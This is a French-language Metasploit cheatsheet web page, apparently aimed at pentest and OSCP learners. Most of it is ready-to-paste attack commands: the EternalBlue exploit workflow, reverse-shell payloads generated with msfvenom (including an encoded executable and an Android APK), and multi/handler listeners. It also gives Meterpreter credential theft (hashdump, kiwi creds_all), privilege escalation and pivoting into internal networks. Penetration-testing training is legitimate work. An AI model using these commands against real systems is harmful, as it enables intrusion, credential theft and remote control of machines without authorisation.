# Démarrage & base de données
Initialisez d'abord la base PostgreSQL — elle stocke hôtes, services et butin, et accélère beaucoup la recherche.
sudo msfdb initmsfconsole -qdb_statusdb_nmap -sV -sC 10.10.10.5hosts; servicesworkspace -a client_x# Rechercher & sélectionner des modules
Trouvez le bon module rapidement avec des filtres. Metasploit fournit 2000+ exploits et des milliers de modules auxiliaires.
search eternalbluesearch type:exploit platform:windows cve:2021search name:smb type:auxiliaryuse 0info# Le workflow d'exploitation
La boucle centrale : use → régler les options → check → exploit. Même schéma pour chaque module.
use exploit/windows/smb/ms17_010_eternalblueshow optionsset RHOSTS 10.10.10.5set LHOST tun0set LPORT 443checkexploit -j# Payloads
Choisissez un payload adapté à la cible et à votre réseau. Staged (/) nécessite un stager ; stageless (_) est un blob autonome unique.
show payloadsset payload windows/x64/meterpreter/reverse_tcpset payload windows/x64/meterpreter_reverse_httpsset payload linux/x64/shell_reverse_tcpwindows/.../reverse_tcp) envoie d'abord un petit stager ; stageless (meterpreter_reverse_tcp) est un seul blob — plus fiable sur des liens instables.# multi/handler — attraper n'importe quel shell
Utilisez le handler pour recevoir la connexion d'un payload généré avec msfvenom ou déposé manuellement.
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; runmsfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"set ExitOnSession false# msfvenom — générer des payloads
Créez des fichiers payload autonomes dans n'importe quel format. Attrapez-les avec un multi/handler correspondant.
msfvenom -l payloadsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exemsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elfmsfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.phpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exemsfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk# Commandes Meterpreter
Une fois une session Meterpreter obtenue, voici les commandes du quotidien.
sysinfo; getuidgetsystemgetprivshashdumpupload /tmp/winPEAS.exe C:\\Windows\\Temp\\download C:\\Users\\admin\\Desktop\\proof.txtshellmigrate -N explorer.exeload kiwi; creds_all# Gestion des sessions
Jonglez entre plusieurs shells et améliorez les shells basiques en Meterpreter.
sessions -lsessions -i 1Ctrl+Zsessions -u 2sessions -c "whoami" -i 1sessions -K# Modules de post-exploitation
Lancez des modules post contre une session existante pour l'énumération et la persistance.
run post/multi/recon/local_exploit_suggesterrun post/windows/gather/enum_logged_on_usersrun post/windows/manage/migraterun post/multi/manage/shell_to_meterpreter# Pivoting
Utilisez un hôte compromis comme passerelle vers des sous-réseaux internes inaccessibles directement.
run autoroute -s 10.10.20.0/24use post/multi/manage/autoroute; set SESSION 1; runuse auxiliary/server/socks_proxy; set SRVPORT 1080; run -jproxychains nmap -sT -Pn 10.10.20.10portfwd add -l 3389 -p 3389 -r 10.10.20.10❓ FAQ Metasploit
Le framework de pentest le plus utilisé — des milliers d'exploits, payloads, modules auxiliaires et post derrière une console (msfconsole). On cherche un module, on règle ses options (RHOSTS, LHOST) et on le lance.
msfconsole est la console interactive pour lancer les modules. msfvenom génère des fichiers payload autonomes (exe, elf, php, apk). On génère souvent avec msfvenom et on attrape avec un multi/handler.
Le payload avancé en mémoire de Metasploit. Il offre transfert de fichiers, getsystem, hashdump, capture d'écran, keylogging et pivoting — sans écrire sur le disque, plus discret qu'un simple shell.
use exploit/multi/handler, réglez payload pour correspondre à votre payload msfvenom, réglez LHOST/LPORT, puis run. Il attrape la connexion entrante et ouvre une session.
sessions -l liste, sessions -i ID interagit, Ctrl+Z met en arrière-plan. Lancez sans interagir via sessions -c 'whoami' -i ID, améliorez un shell avec sessions -u ID.
Depuis Meterpreter, run autoroute -s 10.10.20.0/24, puis utilisez des scanners auxiliaires en interne, ou démarrez auxiliary/server/socks_proxy et pointez proxychains dessus.
Vous pouvez utiliser Metasploit/Meterpreter sur une seule cible de votre choix ; c'est restreint ailleurs, donc maîtrisez l'exploitation manuelle. msfvenom pour les payloads est généralement autorisé — vérifiez les règles en vigueur.
Sous Kali : sudo apt update && sudo apt install metasploit-framework. Depuis l'installeur Rapid7, utilisez msfupdate. Puis lancez msfconsole et reload_all pour reconstruire le cache des modules.
📚 Ressources liées
- Cheatsheet Reverse Shell — Payloads hors Metasploit quand msf est restreint (OSCP)
- Cheatsheet Nmap — Injectez les résultats db_nmap directement dans votre workspace
- Cheatsheet Élévation de privilèges Windows — Escalader quand getsystem ne suffit pas
- Cheatsheet OSCP — Connaître la règle « une seule cible Metasploit » de l'examen
Transformez vos sessions Metasploit en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.
Envie des 12 020+ commandes ?
Cette cheatsheet Metasploit n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.
Commencer gratuitement →